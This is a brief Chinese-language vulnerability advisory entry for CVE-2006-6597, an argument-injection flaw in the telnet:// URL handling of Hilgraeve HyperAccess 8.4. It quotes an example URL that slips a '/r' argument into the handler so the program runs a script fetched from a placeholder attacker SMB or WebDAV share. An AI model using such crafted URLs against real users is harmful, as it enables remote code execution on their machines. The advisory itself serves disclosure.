Hilgraeve HyperAccess 8.4 - Multiple... CVE-2006-6597 CNNVD-200612-350

6.8 AV AC AU C I A
发布: 2006-12-15
修订: 2024-02-13

HyperACCESS是HyperTerminal的官方升级,可为用户提供终端通讯解决方案。 HyperAccess中存在参数注入漏洞,以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件,可使用类似于以下的URL通过Internet Explorer将该命令传送给URL:telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt ,如果SERVER为包含有恶意脚本的SMB共享或WEBDAV Web共享的话,就会导致执行任意vbscript代码。

0%
当前有2条漏洞利用/PoC
当前有1条受影响产品信息